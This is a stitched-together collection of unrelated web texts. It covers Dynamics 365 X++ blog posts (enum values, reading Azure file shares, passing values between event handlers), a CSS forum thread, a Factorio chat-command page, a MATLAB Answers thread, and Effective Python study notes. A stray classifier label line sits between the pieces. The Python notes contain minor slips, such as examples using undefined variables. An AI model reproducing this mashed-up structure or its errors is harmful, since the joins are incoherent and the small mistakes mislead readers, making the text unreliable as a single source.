Let's run the class and check the data in the DB and the UI. In the DB the value is equal to the value from the enum properties – 10:

MyEnumInDBFromX++

On the form we can see an empty value:

MyFormInsertFromX++

Let's create a new record using the UI and check what is saved to the DB.

MyFormInsertFromUI
MyEnumInDBFromUI

As you can see, the value is equal to 1. For these enums a value entered from the UI will never be equal to a value entered from X++ code, so if a record is created in X++ the user would see empty values, and if it is created from the UI an X++ comparison like:

If (myTable.MyEnum == MyEnum::Ten)

would always return false, even if the user sees "Ten" on the UI, because the values are different.

It was a common practice to have gaps in enum values for different layers, so you could avoid conflicts when new values were created in a new version or a hotfix. AssetTransType is a good example, where localization-related values start from 100, because they used to be on another layer. However, most standard enums use enum values, so probably that is why this bug was not spotted before.

As a good citizen, I filed a bug, but I have a sneaky suspicion that it won't be fixed soon, so be aware of this volatile mix, try to avoid changing the "Use Enum Value" property, and review your enums in case you have one!
You can find several blogs explaining how to upload and download files to Blob, SharePoint or temporary storage. However, what about file shares? Azure File storage implements the SMB 3.0 protocol and can easily be mapped to your local computer. You need just a few minutes to create a new storage account and mount it; watch this how-to video for details.

To read a file from the newly created share we can use the following code:

using Microsoft.Azure;
using Microsoft.WindowsAzure.Storage;
using Microsoft.WindowsAzure.Storage.Blob;
using Microsoft.WindowsAzure.Storage.File;

class RunnableClass1
{
    public static void main(Args _args)
    {
        System.IO.MemoryStream memoryStream;

        var storageCredentials = new Microsoft.WindowsAzure.Storage.Auth.StorageCredentials('AzureStorageAccountName', 'AzureStorageAccountKey');
        CloudStorageAccount storageAccount = new Microsoft.WindowsAzure.Storage.CloudStorageAccount(storageCredentials, true);
        CloudFileClient fileClient = storageAccount.CreateCloudFileClient();
        CloudFileShare share = fileClient.GetShareReference('AzureStorageShareName');

        if (share.Exists(null, null))
        {
            CloudFileDirectory rootDir = share.GetRootDirectoryReference();
            CloudFileDirectory fileDir = rootDir.GetDirectoryReference('folder');

            if (fileDir.Exists(null, null))
            {
                CloudFile file = fileDir.GetFileReference('file.txt');

                if (file.Exists(null, null))
                {
                    memoryStream = new System.IO.MemoryStream();
                    file.DownloadToStream(memoryStream, null, null, null);
                }
            }
        }
    }
}

References:

Edited: Azure File Storage client source code can be found on GitHub

D365O. Trick to pass a value between Pre and Post event handler using XppPrePostArgs.

Recently we came across a scenario where we needed to check if a field has changed after super() in the update method of a table. Back in the days of AX 2012 you could easily compare the original field's value with the current one using the orig() method before super() and call the necessary logic after.
public void update()
{
    boolean myFieldHasChanged = this.MyField != this.orig().MyField;

    super();

    if (myFieldHasChanged)
    {
        this.doStuff();
    }
}

Now we want to do the same using extensions. We can create Pre and Post event handlers, but they are static, so we need a way to pass a value between them. The first option is to use a static field, like it's done in the RunBase extension example

public static class MyTableEventHandler
{
    private static UnknownNoYes myFieldHasChanged;

    [PreHandlerFor(tableStr(MyTable), tableMethodStr(MyTable, update))]
    public static void MyTable_Pre_update(XppPrePostArgs _args)
    {
        MyTable myTable = _args.getThis() as MyTable;

        if (myTable.MyField != myTable.orig().MyField)
        {
            MyTableEventHandler::myFieldHasChanged = UnknownNoYes::Yes;
        }
        else
        {
            MyTableEventHandler::myFieldHasChanged = UnknownNoYes::No;
        }
    }

    [PostHandlerFor(tableStr(MyTable), tableMethodStr(MyTable, update))]
    public static void MyTable_Post_update(XppPrePostArgs _args)
    {
        MyTable myTable = _args.getThis() as MyTable;

        if (MyTableEventHandler::myFieldHasChanged == UnknownNoYes::Yes)
        {
            myTable.doStuff();
        }

        MyTableEventHandler::myFieldHasChanged = UnknownNoYes::Unknown;
    }
}

Another option is to use XppPrePostArgs as a vehicle for a new parameter. XppPrePostArgs has a collection of parameters under the hood, so nothing stops us from adding one more, and the framework will take care of passing it between the Pre and Post event handlers!
XppPrePostArgs_collection.jpg

public static class MyTableEventHandler_XppPrePostArgs
{
    const static str myFieldHasChangedArgName = 'myFieldHasChanged';

    [PreHandlerFor(tableStr(MyTable), tableMethodStr(MyTable, update))]
    public static void MyTable_Pre_update(XppPrePostArgs _args)
    {
        MyTable myTable = _args.getThis() as MyTable;
        boolean myFieldHasChanged = myTable.MyField != myTable.orig().MyField;

        _args.addArg(MyTableEventHandler_XppPrePostArgs::myFieldHasChangedArgName, myFieldHasChanged);
    }

    [PostHandlerFor(tableStr(MyTable), tableMethodStr(MyTable, update))]
    public static void MyTable_Post_update(XppPrePostArgs _args)
    {
        MyTable myTable = _args.getThis() as MyTable;
        boolean myFieldHasChanged = _args.getArg(MyTableEventHandler_XppPrePostArgs::myFieldHasChangedArgName);

        if (myFieldHasChanged)
        {
            myTable.doStuff();
        }
    }
}

Using one of these approaches you should remember that static fields apply to the class, not to instances of the class, so they do not mix well with concurrency. The trick with XppPrePostArgs depends tightly on the current implementation, which could change at any time and comes with no warranty. To overcome this and other limitations of extension capabilities Microsoft is introducing Method wrapping and chain of command, and I'm pretty sure we'll see blogs on this from my MVP fellows soon.
5. Use classes to add class... what am I doing wrong? #1 I keep getting the error code: "Opps, try again. Did you remember to give you .friend class a border of 2px dashed #008000?" I can't figure out what I'm doing wrong to save my life! HTML <!DOCTYPE html> <html> <head> <link type="text/css" rel="stylesheet" href="stylesheet.css"/> <title>My Social Network</title> </head> <body> <!--Add your HTML below!--> <div class="friend" id="best_friend"><p>Rodger</p></div> <div class="friend"><p>Roy</p></div> <div class="family"><p>Ron</p></div> <div class="enemy"><p>Ray</p></div> <div class="enemy" id="archnemesis"><p>Rida</p></div> </body> </html> CSS: div { display: inline-block; margin-left: 5px; margin-top: 5px; height: 100px; width: 100px; border-radius: 100%; border: 2px; text-align: center; position: relative; } best_friend { border: 4px solid #008000; } .friend { border: 2px dashed #008000; } .family { border: 2px dashed #0000FF; } .enemy { border: 2px dashed #FF0000; } archnemesis { border: 4px solid #FF0000; } #2 Your best_friend and archnemesis overwrite your friend and enemy, causing problems in the checking script #3 How do I correct the problem? I don't understand how "best_friend" and "archnemesis" are overwriting "friend" and "enemy" #4 Well, some of your divs to both have a class and id, the id styling will be applied, so some of your friend and enemy div's have the wrong border. You could turn the #best_friend and #archnemesis into a comment #5 I just removed the class from those div lines and left the IDs and everything worked. Thanks! #6 That will also work.
Factorio Ignore Command Use this command to ignore a player - ignoring a player means that you will not see messages they send in chat. Messages from administrators are still shown. Ignore Syntax The syntax for the ignore command is as follows: /ignore [player name] This command has the following arguments: Player NameThe name of the player you wish to hide messages from. Looking for other commands? Search our database of 39 Factorio commands... To the Commands Ignore Examples Find below working examples of the ignore command. /ignore john23 Executing this command would ignore the player with username 'john23', meaning you would not see any of their messages they send in chat (or via PM). /ignore eviladmin In this example, the player with username 'eviladmin' is an administrator. Despite having ignored the player, messages they send in chat will still be sent to you because they are an administrator (you cannot ignore admins).
MATLAB Answers

How can I make the words in a table not split?

5 views (last 30 days)

John on 25 Sep 2020
Commented: John on 29 Sep 2020

In the above table, the word is split. How can I keep the words "right" and "left" (and any word) from being split?

2 Comments

John on 25 Sep 2020
Hi, Walter: Yes, as the tags indicate. It looks bad. Hope there is a way to make it right. Thanks.

Accepted Answer

Rhea Chandy on 28 Sep 2020

Hi John, it's my understanding that you are using Report Generator and you want to avoid hyphenation, i.e. splitting the words in a table entry. You can use the Hyphenation class to specify the hyphenation behaviour of paragraphs and table cells.

h = mlreportgen.dom.Hyphenation(false)

This will disable hyphenation and set the property Value to []. You can refer to this documentation to learn about the Hyphenation class and how to apply it.

3 Comments

John on 29 Sep 2020
It seems that in either version, "When hyphenation was disabled, a line break occurred only between words", and this is what I wanted to break between words. Anyways, I'll install R2020b and see what's going on. Thanks. Sign in to comment. More Answers (0) Community Treasure Hunt Find the treasures in MATLAB Central and discover how the community can help you! Start Hunting! Translated by
__label__pos
0.834751
Effective Python Summary Notes# I’ve been wanting to learn and improve my python so I read a book and took notes from Effective Python - Brett Slatkin. He has some good tech reads on his blog. Pythonic Thinking# Know which python version you are using# $ python –version of >>> import sys >>> print(sys.version_info) sys.version_info(major=3, minor=6, micro=4, releaselevel='final', serial=0) >>> print(sys.version) 3.6.4 (default, Mar 9 2018, 23:15:03) [GCC 4.2.1 Compatible Apple LLVM 9.0.0 (clang-900.0.39.2)] • Prefer python 3 for new projects. • There are many runtimes: CPython, Jython, Itonpython, PyPy. Default is CPython. Follow PEP8 Style Guide# Conistent style makes code more approachable and easy to read Facilitates collaboration Read the pep8 style guide Know the Differences Between bytes, str, and unicode# In python 3 there is bytes and str. str contain unicode values bytes contain raw 8-bit values • You need to use encode and decode to convert unicode to bytes • Do encoding and decoding at the furtherest boundary of the interface (so core of program works with unicode) • bytes and str instances are never equivalent (In python 3) • File handles (using open) default to UTF-8 encoding Ensure to use wb write-banary mode as opposed to w wrote character mode: with open('/tmp/random.bin', 'wb') as f: Write helper functions, instead of complex expressions# Consider: red = int(my_values.get('red', [''])[0] or 0) This code is not obvious. There is a lot of visual noise and it is not approachable. You could use a ternary: red = my_values.get('red', ['']) red = int(red[0]) if red[0] else 0 but it is still not great. So a helper function: def get_first_int(values, key, default=0):     found = values.get(key, [''])     if found[0]:         found = int(found[0])     else:         found = default     return found and calling: green = get_first_int(my_values, 'green') is much clearer. 
• Use complex expressions to a help function, espescially when logic is repeated Know how to slice sequences# • list, str and bytes can be sliced • The result of a slice is a whole new list, the original is not changed Syntax is: somelist[start:end] eg: a = [1, 2, 3, 4] a[:2] a[:5] a[0:5] Avoid Using start, end, and stride in a Single Slice# somelist[start:end:stride] The stride lets you take every nth item >>> colours = ['red', 'orange', 'yellow', 'blue', 'green'] >>> colours[::2] ['red', 'yellow', 'green'] • Can be very confusing, espescially negative strides • Avoid start and end when doing a stride • Use itertools module islice function if necessary Use List Comprehensions Instead of map and filter# List comprehensions derive one list from another >>> numbers = [1, 2, 3, 4, 5, 6, 7, 8, 9, 10] >>> [x**2 for x in numbers] [1, 4, 9, 16, 25, 36, 49, 64, 81, 100] Preferable over using map that requires a lambda squares = map(lambda x: x ** 2, a) You can also use lsit comprehensions to filter with an if: [x**2 for x in numbers if x % 2 == 0] which can be achieved with map and filter: alt = map(lambda x: x**2, filter(lambda x: x % 2 == 0, a)) list(alt) There are also list comprehensions for dict and set chile_ranks = {'ghost': 1, 'habanero': 2, 'cayenne': 3} # dict comprehension rank_dict = {rank: name for name, rank in chile_ranks.items()} # set comprehensoin chile_len_set = {len(name) for name in rank_dict.values()} Avoid More Than Two Expressions in List Comprehensions# List comprehensions support multiple loops matrix = [[1, 2, 3], [4, 5, 6], [7, 8, 9]] flat = [x for row in matrix for x in row] and multiple if conditions a = [1, 2, 3, 4, 5, 6, 7, 8, 9, 10] b = [x for x in a if x > 4 if x % 2 == 0] c = [x for x in a if x > 4 and x % 2 == 0] You can also use conditions at each level: matrix = [[1, 2, 3], [4, 5, 6], [7, 8, 9]] filtered = [[x for x in row if x % 3 == 0]             for row in matrix if sum(row) >= 10] print(filtered) But this is horrendous for someone 
else to comprehend.

Consider Generator Expressions for Large Comprehensions#

• List comprehensions create a new list with at most the same number of values as the input sequence
• For large inputs this may cause the program to crash due to memory usage
• To solve this, Python provides generator expressions, a generalisation of list comprehensions and generators
• Generator expressions evaluate to an iterator that yields one item at a time from the expression

When you're looking for a way to compose functionality that operates on a large stream of input, generator expressions are the best tool for the job:

```python
it = (len(x) for x in open('/tmp/my_file.txt'))

gen = (print(i) for i in [9, 1, 2, 3, 3])
next(gen)
```

Prefer Enumerate over Range#

If you need the index, use enumerate: it wraps any iterator with a lazy generator. As opposed to:

```python
for i in range(len(flavor_list)):
    flavor = flavor_list[i]
    print('{}: {}'.format(i + 1, flavor))
```

consider (the second argument sets where enumerate should begin counting):

```python
for i, flavor in enumerate(flavor_list, 1):
    print('{}: {}'.format(i, flavor))
```

Use zip to process iterators in parallel#

```python
names = ['Cecilia', 'Lise', 'Marie']
letters = [len(n) for n in names]
```

For processing a list and a derived list simultaneously, you can use enumerate to get the index:

```python
for i, name in enumerate(names):
    count = letters[i]
    if count > max_letters:
        longest_name = name
        max_letters = count
```

But Python provides zip, which wraps two or more iterators with a lazy generator. The zip generator yields tuples containing the next value from each iterator:

```python
for name, count in zip(names, letters):
    if count > max_letters:
        longest_name = name
        max_letters = count
```

• If the supplied iterators are not the same length, zip keeps going until one is exhausted.
• zip will truncate quietly

Avoid Else blocks after for and while#

```python
for i in range(3):
    print('Loop {}'.format(i))
else:
    print('Else block!')
```

Python, unusually, allows an else after a for, which trips up new programmers. The else block runs at the end of the loop, so it executes regardless of whether the loop body was entered or not.

• A break statement in the for part will skip the else block
• The behaviour is not obvious or intuitive

Take Advantage of Each Block in try/except/else/finally#

Finally Blocks#

Use try...finally when you want exceptions to propagate up but you also want to run cleanup code when exceptions occur.

```python
handle = open('/tmp/random_data.txt')  # May raise IOError
try:
    data = handle.read()  # May raise UnicodeDecodeError
finally:
    handle.close()        # Always runs after try:
```

Else Blocks#

• When the try block doesn't raise an exception, the else block will run.
• The else block helps you minimise the amount of code in the try block and improves readability.

```python
def load_json_key(data, key):
    try:
        result_dict = json.loads(data)  # May raise ValueError
    except ValueError as e:
        raise KeyError from e
    else:
        return result_dict[key]
```

If decoding is successful, the requested key is returned; if that lookup raises a KeyError, it propagates up to the caller.

Everything together: Try…Except…Else…Finally#

```python
UNDEFINED = object()

def divide_json(path):
    handle = open(path, 'r+')   # May raise IOError
    try:
        data = handle.read()    # May raise UnicodeDecodeError
        op = json.loads(data)   # May raise ValueError
        value = (op['numerator'] /
                 op['denominator'])  # May raise ZeroDivisionError
    except ZeroDivisionError as e:
        return UNDEFINED
    else:
        op['result'] = value
        result = json.dumps(op)
        handle.seek(0)
        handle.write(result)    # May raise IOError
        return value
    finally:
        handle.close()          # Always runs
```

Functions#

Functions are the best organisation tool, helping to break up large programs into smaller pieces.
They improve readability and make code more approachable.

Prefer Exceptions to Returning None#

There's a draw for Python programmers to give special meaning to a return value of None. Take a helper function that divides one number by another: in the case of dividing by zero, returning None seems natural because the result is undefined.

```python
def divide(a, b):
    try:
        return a / b
    except ZeroDivisionError:
        return None
```

Using the function:

```python
result = divide(x, y)
if result is None:
    print('Invalid inputs')
```

The problem: what if the numerator is 0 and the denominator is not? The function returns 0, and callers who evaluate the result in an if condition looking for falsiness instead of is None will misinterpret it. That is why returning None is error prone.

There are two ways to fix this. The first is returning a two-tuple of (success_flag, result); the problem is that some callers will just ignore the flag with _ for unused variables.

The better way is to not return None at all, but rather raise an exception and have the caller deal with it:

```python
def divide(a, b):
    try:
        return a / b
    except ZeroDivisionError as e:
        raise ValueError('Invalid inputs') from e
```

I would even not re-raise as a ValueError. It is then handled better by the caller (no check for None):

```python
x, y = 5, 2
try:
    result = divide(x, y)
except ValueError:
    print('Invalid inputs')
else:
    print('Result is {:.1f}'.format(result))

>>> Result is 2.5
```

Raise exceptions instead of returning None.

Know How Closures Interact with Variable Scope#

• closures: functions that refer to variables from the scope in which they were defined
• functions are first-class objects: you can refer to them directly, assign them to variables and pass them as arguments to other functions

When you reference a variable, the Python interpreter resolves the reference in this order:

1. The current function's scope
2. Any enclosing scopes
3. The scope of the module containing the code (global scope)
4. The built-in scope (Python's built-in functions: len, str, etc.)
If none of these find the reference, a NameError is raised.

Assigning a value to a variable works differently. If the variable is already defined in the current scope, it just takes on the new value. If the variable doesn't exist in the current scope, Python treats the assignment as a variable definition.

```python
def sort_priority2(numbers, group):
    found = False         # Scope: 'sort_priority2'
    def helper(x):
        if x in group:
            found = True  # Scope: 'helper' -- Bad!
            return (0, x)
        return (1, x)
    numbers.sort(key=helper)
    return found
```

So how do you get the data out? The nonlocal statement indicates that scope traversal should happen upon assignment for a specific variable name. It won't go up to the module level.

```python
def sort_priority3(numbers, group):
    found = False
    def helper(x):
        nonlocal found
        if x in group:
            found = True
            return (0, x)
        return (1, x)
    numbers.sort(key=helper)
    return found
```

• It's complementary to the global statement, which indicates that a variable's assignment should go directly into the module scope.
• When your usage of nonlocal starts getting complicated, it's better to wrap your state in a helper class.
• By default, closures can't affect enclosing scopes by assigning variables.
• Avoid nonlocal

A class can be used to make it much easier to read:

```python
class Sorter(object):
    def __init__(self, group):
        self.group = group
        self.found = False

    def __call__(self, x):
        if x in self.group:
            self.found = True
            return (0, x)
        return (1, x)

sorter = Sorter(group)
numbers.sort(key=sorter)
assert sorter.found is True
```

Consider Generators Instead of Returning Lists#

Take getting the indices of words in a sentence:

```python
def index_words(text):
    result = []
    if text:
        result.append(0)
    for index, letter in enumerate(text):
        if letter == ' ':
            result.append(index + 1)
    return result
```

• It is dense and noisy
• One line for creating the result list and one for returning it
• It requires all results to be stored in the list before being returned (inefficient use of memory)

The better way is to use a generator. When called, generator functions do not actually run but instead immediately return an iterator. With each call to __next__ on the iterator, it advances to the next yield expression.

```python
def index_words_iter(text):
    if text:
        yield 0
    for index, letter in enumerate(text):
        if letter == ' ':
            yield index + 1
```

• It is easier to read, as references to the result list have been eliminated
• The iterator returned by the generator can be converted with list()
• Works line by line, which is especially useful when reading from a file as a stream

Be Defensive when Iterating over Arguments#

An iterator only produces its results a single time. If you iterate over an iterator or generator that has already raised a StopIteration exception, you won't get any results the second time around. Using our previous example:

```python
address = 'Four score and seven years ago...'
word_iterator = index_words_iter(address)
print(list(word_iterator))
print(list(word_iterator))
```

returns

```
[0, 5, 11, 15, 21, 27]
[]
```

Also, no exception is raised, because Python functions expect the StopIteration exception during normal operation.
They don't know the difference between an iterator with no output and an iterator whose output has been exhausted.

One way to fix this is to copy the results of the iterator into a list, but the output could be large and cause your program to crash. The better way to achieve the same result is to provide a new container class that implements the iterator protocol.

The iterator protocol is how Python for loops and related expressions traverse the contents of a container type. When Python sees a statement like for x in foo it will actually call iter(foo). The iter built-in function calls the foo.__iter__ special method in turn. The __iter__ method must return an iterator object (which itself implements the __next__ special method). Then the for loop repeatedly calls the next built-in function on the iterator object until it's exhausted (and raises a StopIteration exception).

It sounds complicated, but practically speaking you can achieve all of this behaviour for your classes by implementing the __iter__ method as a generator:

```python
class WordIndexer:
    def __init__(self, text):
        self.text = text

    def __iter__(self):
        if self.text:
            yield 0
        for index, letter in enumerate(self.text):
            if letter == ' ':
                yield index + 1
```

calling it with:

```python
word_index = WordIndexer(address)
print(list(word_index))
print(list(word_index))
```

Now WordIndexer is a class that implements the iterator protocol (a container for an iterator). We still need to ensure that what gets passed into a function is a container, not an iterator:

```python
def normalize_defensive(numbers):
    '''When an iterator is passed into iter() the same iterator is
    returned; when a container is passed in, a new iterator is
    returned each time'''
    if iter(numbers) is iter(numbers):
        raise TypeError('Must supply a container')
```

Reduce Visual Noise with Variable Positional Arguments#

Optional positional arguments (*args) can make a function call clearer and remove visual noise.
Take this example:

```python
def log(message, values):
    if not values:
        print(message)
    else:
        values_str = ', '.join(str(x) for x in values)
        print('{}: {}'.format(message, values_str))

log('My numbers are', [1, 2])
log('hello world', [])  # just to print the message I must pass an empty []
```

You can tell Python the parameter is optional and variadic with:

```python
def log(message, *values):
    ...
```

and then call it with:

```python
log('hello world')
```

You would need to change how you pass sequences in, though:

```python
favorites = [7, 33, 99]
log('Favorite colors', *favorites)
```

The *favorites tells Python to pass the items of the sequence as positional arguments: with the star, values becomes (7, 33, 99); without it, values would be ([7, 33, 99],).

There are a few problems:

1. The variable arguments are always turned into a tuple before they are passed to your function. This could consume a lot of memory if a generator is passed, as the whole thing is turned into a tuple. Functions that accept *args are best for situations where you know the number of inputs in the argument list will be reasonably small.
2. You can't add new positional arguments to your function in the future without migrating every caller. I.e. adding

```python
def log(sequence, message, *values):
```

will break an existing call to log('hello world'). Bugs like this are hard to track down. Therefore you should use keyword-only arguments when extending a function that already accepts *args.

Provide Optional Behavior with Keyword Arguments#

All positional arguments in Python can also be passed by keyword.
They can be called:

```python
def remainder(number, divisor):
    return number % divisor

assert remainder(20, 7) == 6
assert remainder(20, divisor=7) == 6
assert remainder(number=20, divisor=7) == 6
assert remainder(divisor=7, number=20) == 6
```

One way it cannot be called is with:

```python
assert remainder(number=20, 7) == 6
```

as that raises:

```
SyntaxError: positional argument follows keyword argument
```

Also, each argument may only be specified once:

```python
remainder(20, number=7)
```

gives:

```
TypeError: remainder() got multiple values for argument 'number'
```

• Keyword arguments make function calls clearer to new readers of the code
• They can have default values, reducing repetitive code and noise (though this gets difficult with complex defaults)
• They provide a powerful way to extend a function's parameters while maintaining backwards compatibility with existing calls

With a default period of one second:

```python
def flow_rate(weight_diff, time_diff, period=1):
    return (weight_diff / time_diff) * period
```

would be preferable to:

```python
def flow_rate(weight_diff, time_diff, period):
    return (weight_diff / time_diff) * period
```

You could also extend this without breaking existing calls:

```python
def flow_rate(weight_diff, time_diff,
              period=1, units_per_kg=1):
    return ((weight_diff / units_per_kg) / time_diff) * period
```

The only problem is that the optional arguments period and units_per_kg may still be specified positionally:

```python
pounds_per_hour = flow_rate(weight_diff, time_diff, 3600, 2.2)
```

The best practice is to always specify optional arguments using the keyword names and never pass them as positional arguments.
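A minimal sketch of that best practice in action, reusing the extended flow_rate signature from above (the 0.5 kg / 3 s inputs are made-up values for illustration):

```python
def flow_rate(weight_diff, time_diff, period=1, units_per_kg=1):
    return ((weight_diff / units_per_kg) / time_diff) * period

# Positional call: unclear what 3600 and 2.2 mean at the call site
pounds_per_hour = flow_rate(0.5, 3, 3600, 2.2)

# Keyword call: the intent is explicit, and further optional
# parameters can be added later without ambiguity
pounds_per_hour = flow_rate(0.5, 3, period=3600, units_per_kg=2.2)

# Existing callers relying on the defaults keep working
grams_per_second = flow_rate(0.5, 3)
```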
Use None and Docstrings to specify dynamic default arguments#

Sometimes you need a non-static value as a keyword argument's default. For example, when logging a message you want to include the time and date of the log:

```python
def log(message, when=datetime.datetime.now()):
    print('{}: {}'.format(when, message))

log('Hi there!')
sleep(0.1)
log('Hi again!')

>>> 2018-07-13 21:34:08.251207: Hi there!
>>> 2018-07-13 21:34:08.251207: Hi again!
```

Remember datetime.datetime.now() is only run once, when the function is defined. The convention for achieving the desired result is to set when=None and document how to use the function in a docstring:

```python
def log(message, when=None):
    '''Log a message with a timestamp

    Args:
        message: Message to print
        when: datetime of when the message occurred.
            Defaults to the present time.
    '''
    when = datetime.datetime.now() if when is None else when
    print('{}: {}'.format(when, message))
```

The None default is especially important for arguments that are mutable. Say you want to decode some JSON with a default:

```python
def decode(data, default={}):
    try:
        return json.loads(data)
    except ValueError:
        return default

foo = decode('bad data')
foo['stuff'] = 5
bar = decode('also bad data')
foo['jink'] = '45'
print('Foo:', foo)
print('bar:', bar)

>>> Foo: {'stuff': 5, 'jink': '45'}
>>> bar: {'stuff': 5, 'jink': '45'}
```

Unfortunately foo and bar are both equal to the default parameter. They are the same dictionary object being modified.
The fix is setting default=None:

```python
def decode(data, default=None):
    if default is None:
        default = {}
    try:
        return json.loads(data)
    except ValueError:
        return default
```

• Use None as the default for keyword arguments that should have a dynamic value
• Default argument values are evaluated only once, at function definition (module load) time

Enforce Clarity with Keyword-Only Arguments#

Say you have a function with signature:

```python
def safe_division(number, divisor, ignore_overflow, ignore_zero_division):
    ...
```

expecting the ignore_overflow and ignore_zero_division flags to be boolean. You can call it:

```python
>>> result = safe_division(1, 0, False, True)
>>> result = safe_division(1, 10**500, True, False)
```

It is not clear what the boolean flags mean, and it is easy to confuse them. One improvement is to default them to False so callers must say which flags they want to switch on. The problem is you can still call it with:

```python
safe_division(1, 10**500, True, False)
```

In Python 3 you can demand clarity with keyword-only arguments. These arguments can only be supplied by keyword, never by position. You do this using the * symbol in the argument list, which marks the end of positional arguments and the beginning of keyword-only arguments:

```python
def safe_division_c(number, divisor, *,
                    ignore_overflow=False,
                    ignore_zero_division=False):
    ...
```

Now calling it badly:

```python
safe_division_c(1, 10**500, True, False)

>>> TypeError: safe_division_c() takes 2 positional arguments but 4 were given
```

Classes and Inheritance#

Python supports inheritance (acquiring attributes and methods from a parent class), polymorphism (a way for multiple classes to implement their own unique versions of a method) and encapsulation (restricting direct access to an object's attributes and methods).

Prefer Helper Classes over Bookkeeping with Tuples and Dictionaries#

When a class is getting very complex with many dictionaries and tuples within it, it is time to break it into a hierarchy of classes.
This is a common problem as scope increases (at first you didn't know you had to keep track of such and such). It is important to remember that more than one layer of nesting is a problem:

• Avoid dictionaries that contain dictionaries
• It makes your code hard to read
• It makes maintenance difficult

Breaking it into classes:

• helps create well-defined interfaces encapsulating data
• adds a layer of abstraction between your interfaces and your concrete implementations

Extending tuples is also an issue, as associating more data with them later breaks calling code. A namedtuple from the collections module does exactly what you need: defining a tiny immutable data class.

Limitations of namedtuple:

• You cannot specify default argument values. With a handful of optional values, a class is a better choice.
• Attributes are still accessible by numerical indices and iteration

A complete example:

```python
Grade = collections.namedtuple('Grade', ('score', 'weight'))

class Subject(object):
    def __init__(self):
        self._grades = []

    def report_grade(self, score, weight):
        self._grades.append(Grade(score, weight))

    def average_grade(self):
        total, total_weight = 0, 0
        for grade in self._grades:
            total += grade.score * grade.weight
            total_weight += grade.weight
        return total / total_weight

class Student(object):
    def __init__(self):
        self._subjects = {}

    def subject(self, name):
        if name not in self._subjects:
            self._subjects[name] = Subject()
        return self._subjects[name]

    def average_grade(self):
        total, count = 0, 0
        for subject in self._subjects.values():
            total += subject.average_grade()
            count += 1
        return total / count

class Gradebook(object):
    def __init__(self):
        self._students = {}

    def student(self, name):
        if name not in self._students:
            self._students[name] = Student()
        return self._students[name]
```

Usage:

```python
book = Gradebook()
albert = book.student('Albert Einstein')
math = albert.subject('Math')
math.report_grade(80, 0.10)
print(albert.average_grade())

>>> 80.0
```

It may have become longer but it is much easier to
read.

Accept Functions for Simple Interfaces Instead of Classes#

Python's built-in APIs let you customise behaviour by passing in a function, like list's sort method that takes a key argument to determine the order. Ordering by length:

```python
names = ['Socrates', 'Archimedes', 'Plato', 'Aristotle']
names.sort(key=lambda x: len(x))
print(names)

>>> ['Plato', 'Socrates', 'Aristotle', 'Archimedes']
```

Functions are ideal for hooks as they are easier to describe and simpler to define than classes, i.e. better than using an abstract class.

• Functions are often all you need as the interface between simple components
• The __call__ special method enables instances of a class to behave like plain old Python functions
• When you need a function to maintain state, consider providing a class that defines __call__

Refer to the book for more information…

Use @classmethod Polymorphism to Construct Objects Generically#

Polymorphism is a way for multiple classes in a hierarchy to implement their own unique version of a method. This allows many classes to fulfil the same interface or abstract base class while providing different functionality.

Say you want a common class to represent input data for a MapReduce function:

```python
class InputData(object):
    def read(self):
        raise NotImplementedError
```

There is one concrete subclass that reads from a file on disk:

```python
class PathInputData(InputData):
    def __init__(self, path):
        self.path = path

    def read(self):
        return open(self.path).read()
```

You could also have a subclass that reads from the network. Now we want a similar setup for a MapReduce worker that consumes the input data in a standard way:

```python
class Worker(object):
    def __init__(self, input_data):
        self.input_data = input_data
        self.result = None

    def map(self):
        raise NotImplementedError

    def reduce(self, other):
        raise NotImplementedError
```

Remember: a concrete class is a class where all methods are completely implemented.
An abstract class is one where some methods are not fully defined (an abstract of a class). The concrete subclass of Worker:

```python
class LineCountWorker(Worker):
    def map(self):
        data = self.input_data.read()
        self.result = data.count('\n')

    def reduce(self, other):
        self.result += other.result
```

Now the big hurdle: what connects these pieces? I have a set of classes with reasonable abstractions and interfaces, but they are only useful once the objects are constructed. What is responsible for building the objects and orchestrating the MapReduce? We can manually build this with helper functions:

```python
def generate_inputs(data_dir):
    for name in os.listdir(data_dir):
        yield PathInputData(os.path.join(data_dir, name))

def create_workers(input_list):
    workers = []
    for input_data in input_list:
        workers.append(LineCountWorker(input_data))
    return workers

def execute(workers):
    threads = [Thread(target=w.map) for w in workers]
    for thread in threads: thread.start()
    for thread in threads: thread.join()

    first, rest = workers[0], workers[1:]
    for worker in rest:
        first.reduce(worker)
    return first.result

def mapreduce(data_dir):
    inputs = generate_inputs(data_dir)
    workers = create_workers(inputs)
    return execute(workers)
```

There is a big problem here: the functions are not generic at all. If you write a different type of InputData or Worker subclass, you would have to rewrite all of these functions. This boils down to needing a generic way to construct objects. In other languages you could solve this with constructor polymorphism, making each subclass of InputData have a special constructor that can be used generically. The problem is that Python only allows the single constructor method __init__; it is unreasonable to require every subclass to have a compatible constructor.

The best way to solve this is with @classmethod polymorphism. This polymorphism extends to whole classes, not just their constructed objects.
```python
class GenericInputData(object):
    def read(self):
        raise NotImplementedError

    @classmethod
    def generate_inputs(cls, config):
        raise NotImplementedError
```

generate_inputs takes a dictionary of configuration parameters that the concrete class must interpret.

```python
class PathInputData(GenericInputData):
    def __init__(self, path):
        self.path = path

    def read(self):
        return open(self.path).read()

    @classmethod
    def generate_inputs(cls, config):
        data_dir = config['data_dir']
        for name in os.listdir(data_dir):
            yield cls(os.path.join(data_dir, name))
```

Similarly, I can make the create_workers helper part of the GenericWorker class. Here, I use the input_class parameter, which must be a subclass of GenericInputData, to generate the necessary inputs. I construct instances of the GenericWorker concrete subclass using cls() as a generic constructor.

```python
class GenericWorker(object):
    # ...
    def map(self):
        raise NotImplementedError

    def reduce(self, other):
        raise NotImplementedError

    @classmethod
    def create_workers(cls, input_class, config):
        workers = []
        for input_data in input_class.generate_inputs(config):
            workers.append(cls(input_data))
        return workers
```

The call to input_class.generate_inputs is the class polymorphism. cls(input_data) likewise provides an alternative way to construct instances, rather than calling __init__ directly. We can then just change the parent class:

```python
class LineCountWorker(GenericWorker):
    ...
```
and finally rewrite mapreduce to be more generic:

```python
def mapreduce(worker_class, input_class, config):
    workers = worker_class.create_workers(input_class, config)
    return execute(workers)
```

Calling the function now requires more parameters:

```python
with TemporaryDirectory() as tmpdir:
    write_test_files(tmpdir)
    config = {'data_dir': tmpdir}
    result = mapreduce(LineCountWorker, PathInputData, config)
```

Initialise Parent Classes with super#

Calling the parent class's __init__ method directly can lead to unpredictable behaviour, especially with multiple inheritance. Python 2.2 introduced super and defined the MRO (Method Resolution Order). Python 3 allows super with no arguments, and it should be used because it is clear, concise and always does the right thing.

